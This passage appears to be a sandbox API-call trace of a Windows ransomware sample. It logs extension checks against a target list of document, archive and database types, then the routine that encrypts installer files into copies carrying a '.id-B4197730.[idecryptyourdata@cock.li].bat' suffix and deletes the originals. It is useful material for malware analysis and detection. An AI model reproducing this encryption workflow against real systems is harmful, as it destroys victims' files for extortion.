lstrlenW (lpString=".bz2") returned 4 [0047.494] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.494] lstrlenW (lpString=".7z") returned 3 [0047.494] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.494] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0047.494] lstrlenW (lpString=".dbf") returned 4 [0047.494] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.494] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0047.494] lstrlenW (lpString=".1cd") returned 4 [0047.494] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.494] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0047.494] lstrlenW (lpString=".jpg") returned 4 [0047.494] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.494] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0047.494] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0047.495] lstrlenW (lpString=".doc") returned 4 [0047.495] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.495] lstrlenW (lpString=".docx") returned 5 [0047.495] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.495] lstrlenW (lpString=".pdf") returned 4 [0047.495] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.495] lstrlenW (lpString=".xls") returned 4 [0047.495] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.495] lstrlenW (lpString=".xlsx") returned 5 [0047.495] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.495] lstrlenW (lpString=".ppt") returned 4 [0047.495] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.495] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0047.495] lstrlenW (lpString=".zip") returned 4 [0047.495] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.495] lstrlenW (lpString=".rar") returned 4 [0047.495] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.495] lstrlenW (lpString=".bz2") returned 4 [0047.495] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.495] lstrlenW (lpString=".7z") returned 3 [0047.495] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.495] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0047.495] lstrlenW (lpString=".dbf") returned 4 [0047.495] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.495] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0047.495] lstrlenW (lpString=".1cd") returned 4 [0047.496] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.496] lstrlenW (lpString="C:\\588bce7c90097ed212\\1031\\LocalizedData.xml") returned 44 [0047.496] lstrlenW (lpString=".jpg") returned 4 [0047.496] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.496] lstrcmpiW (lpString1=".rtf", lpString2=".bat") returned 1 [0047.496] lstrlenW (lpString="eula.rtf") returned 8 [0047.496] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0047.647] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=3683) returned 1 [0047.647] CloseHandle (hObject=0x2cc) returned 1 [0047.648] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf")) returned 0x80 [0047.648] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.648] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0047.648] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.648] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.648] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.648] GetLastError () returned 0x0 [0047.648] ReadFile (in: hFile=0x2cc, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xe63, lpOverlapped=0x0) returned 1 [0047.650] WriteFile (in: hFile=0x2c4, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xe70, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xe70, lpOverlapped=0x0) returned 1 [0047.652] ReadFile (in: hFile=0x2cc, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.652] WriteFile (in: hFile=0x2c4, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xe4, lpOverlapped=0x0) returned 1 [0047.652] SetEndOfFile (hFile=0x2c4) returned 1 [0047.652] CloseHandle (hObject=0x2c4) returned 1 [0047.653] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.653] SetEndOfFile (hFile=0x2cc) returned 1 [0047.654] CloseHandle (hObject=0x2cc) returned 1 [0047.654] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.654] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf")) returned 1 [0047.654] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0047.654] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0047.654] lstrlenW (lpString=".doc") returned 4 [0047.654] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.654] lstrlenW (lpString=".docx") returned 5 [0047.654] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.654] lstrlenW (lpString=".pdf") returned 4 [0047.654] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.655] lstrlenW (lpString=".xls") returned 4 [0047.655] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.655] lstrlenW (lpString=".xlsx") returned 5 [0047.655] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.655] lstrlenW (lpString=".ppt") returned 4 [0047.655] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.655] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0047.655] lstrlenW (lpString=".zip") returned 4 [0047.655] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.655] lstrlenW (lpString=".rar") returned 4 [0047.655] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.655] lstrlenW (lpString=".bz2") returned 4 [0047.655] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.655] lstrlenW (lpString=".7z") returned 3 [0047.655] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.655] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0047.655] lstrlenW (lpString=".dbf") returned 4 [0047.655] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.655] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0047.655] lstrlenW (lpString=".1cd") returned 4 [0047.655] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.655] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0047.655] lstrlenW (lpString=".jpg") returned 4 [0047.655] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.655] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0047.655] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0047.655] lstrlenW (lpString=".doc") returned 4 [0047.655] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.655] lstrlenW (lpString=".docx") returned 5 [0047.656] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.656] lstrlenW (lpString=".pdf") returned 4 [0047.656] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.656] lstrlenW (lpString=".xls") returned 4 [0047.656] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.656] lstrlenW (lpString=".xlsx") returned 5 [0047.656] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.656] lstrlenW (lpString=".ppt") returned 4 [0047.656] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.656] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0047.656] lstrlenW (lpString=".zip") returned 4 [0047.656] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.656] lstrlenW (lpString=".rar") returned 4 [0047.656] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.656] lstrlenW (lpString=".bz2") returned 4 [0047.656] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.656] lstrlenW (lpString=".7z") returned 3 [0047.656] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.656] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0047.656] lstrlenW (lpString=".dbf") returned 4 [0047.656] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.656] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0047.656] lstrlenW (lpString=".1cd") returned 4 [0047.656] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.656] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 35 [0047.656] lstrlenW (lpString=".jpg") returned 4 [0047.656] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.657] lstrcmpiW (lpString1=".rtf", lpString2=".bat") returned 1 [0047.657] lstrlenW (lpString="eula.rtf") returned 8 [0047.657] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0047.657] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=5827) returned 1 [0047.657] CloseHandle (hObject=0x2cc) returned 1 [0047.657] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf")) returned 0x80 [0047.657] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.657] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0047.657] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.658] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.658] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.658] GetLastError () returned 0x0 [0047.658] ReadFile (in: hFile=0x2cc, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x16c3, lpOverlapped=0x0) returned 1 [0047.676] WriteFile (in: hFile=0x2c4, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x16d0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x16d0, lpOverlapped=0x0) returned 1 [0047.677] ReadFile (in: hFile=0x2cc, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.678] WriteFile (in: hFile=0x2c4, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xe4, lpOverlapped=0x0) returned 1 [0047.678] SetEndOfFile (hFile=0x2c4) returned 1 [0047.678] CloseHandle (hObject=0x2c4) returned 1 [0047.679] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.679] SetEndOfFile (hFile=0x2cc) returned 1 [0047.679] CloseHandle (hObject=0x2cc) returned 1 [0047.680] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.680] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf")) returned 1 [0047.681] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0047.681] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0047.681] lstrlenW (lpString=".doc") returned 4 [0047.681] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.681] lstrlenW (lpString=".docx") returned 5 [0047.681] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.681] lstrlenW (lpString=".pdf") returned 4 [0047.681] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.681] lstrlenW (lpString=".xls") returned 4 [0047.681] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.681] lstrlenW (lpString=".xlsx") returned 5 [0047.681] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.681] lstrlenW (lpString=".ppt") returned 4 [0047.681] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.681] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0047.681] lstrlenW (lpString=".zip") returned 4 [0047.681] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.681] lstrlenW (lpString=".rar") returned 4 [0047.681] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.681] lstrlenW (lpString=".bz2") returned 4 [0047.681] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.681] lstrlenW (lpString=".7z") returned 3 [0047.681] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.681] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0047.681] lstrlenW (lpString=".dbf") returned 4 [0047.681] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.681] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0047.681] lstrlenW (lpString=".1cd") returned 4 [0047.682] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.682] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0047.682] lstrlenW (lpString=".jpg") returned 4 [0047.682] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.682] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0047.682] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0047.682] lstrlenW (lpString=".doc") returned 4 [0047.682] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.682] lstrlenW (lpString=".docx") returned 5 [0047.682] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.682] lstrlenW (lpString=".pdf") returned 4 [0047.682] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.682] lstrlenW (lpString=".xls") returned 4 [0047.682] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.682] lstrlenW (lpString=".xlsx") returned 5 [0047.682] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.682] lstrlenW (lpString=".ppt") returned 4 [0047.682] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.682] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0047.682] lstrlenW (lpString=".zip") returned 4 [0047.682] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.682] lstrlenW (lpString=".rar") returned 4 [0047.682] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.682] lstrlenW (lpString=".bz2") returned 4 [0047.683] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.683] lstrlenW (lpString=".7z") returned 3 [0047.683] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.683] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0047.683] lstrlenW (lpString=".dbf") returned 4 [0047.683] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.683] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0047.683] lstrlenW (lpString=".1cd") returned 4 [0047.683] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.683] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0047.683] lstrlenW (lpString=".jpg") returned 4 [0047.683] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.683] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0047.683] lstrlenW (lpString="LocalizedData.xml") returned 17 [0047.683] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0047.684] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=60684) returned 1 [0047.684] CloseHandle (hObject=0x2cc) returned 1 [0047.684] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml")) returned 0x80 [0047.684] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.684] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0047.684] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.684] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.684] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.685] GetLastError () returned 0x0 [0047.685] ReadFile (in: hFile=0x2cc, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xed0c, lpOverlapped=0x0) returned 1 [0047.757] WriteFile (in: hFile=0x2c4, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xed10, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xed10, lpOverlapped=0x0) returned 1 [0047.759] ReadFile (in: hFile=0x2cc, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.759] WriteFile (in: hFile=0x2c4, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xf6, lpOverlapped=0x0) returned 1 [0047.759] SetEndOfFile (hFile=0x2c4) returned 1 [0047.759] CloseHandle (hObject=0x2c4) returned 1 [0047.761] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.761] SetEndOfFile (hFile=0x2cc) returned 1 [0047.762] CloseHandle (hObject=0x2cc) returned 1 [0047.762] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.763] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml")) returned 1 [0047.763] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0047.763] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0047.763] lstrlenW (lpString=".doc") returned 4 [0047.763] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.763] lstrlenW (lpString=".docx") returned 5 [0047.763] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.763] lstrlenW (lpString=".pdf") returned 4 [0047.763] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.763] lstrlenW (lpString=".xls") returned 4 [0047.763] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.763] lstrlenW (lpString=".xlsx") returned 5 [0047.763] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.763] lstrlenW (lpString=".ppt") returned 4 [0047.763] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.763] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0047.763] lstrlenW (lpString=".zip") returned 4 [0047.763] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.763] lstrlenW (lpString=".rar") returned 4 [0047.763] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.764] lstrlenW (lpString=".bz2") returned 4 [0047.764] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.764] lstrlenW (lpString=".7z") returned 3 [0047.764] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.764] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0047.764] lstrlenW (lpString=".dbf") returned 4 [0047.764] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.764] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0047.764] lstrlenW (lpString=".1cd") returned 4 [0047.764] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.764] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0047.764] lstrlenW (lpString=".jpg") returned 4 [0047.764] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.764] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0047.764] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0047.764] lstrlenW (lpString=".doc") returned 4 [0047.764] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.764] lstrlenW (lpString=".docx") returned 5 [0047.764] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.764] lstrlenW (lpString=".pdf") returned 4 [0047.764] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.764] lstrlenW (lpString=".xls") returned 4 [0047.764] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.764] lstrlenW (lpString=".xlsx") returned 5 [0047.764] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.764] lstrlenW (lpString=".ppt") returned 4 [0047.764] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.764] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0047.765] lstrlenW (lpString=".zip") returned 4 [0047.765] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.765] lstrlenW (lpString=".rar") returned 4 [0047.765] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.765] lstrlenW (lpString=".bz2") returned 4 [0047.765] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.765] lstrlenW (lpString=".7z") returned 3 [0047.765] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.765] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 44 [0047.765] lstrlenW (lpString=".dbf") returned 4 [0047.765] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.765] lstrlenW 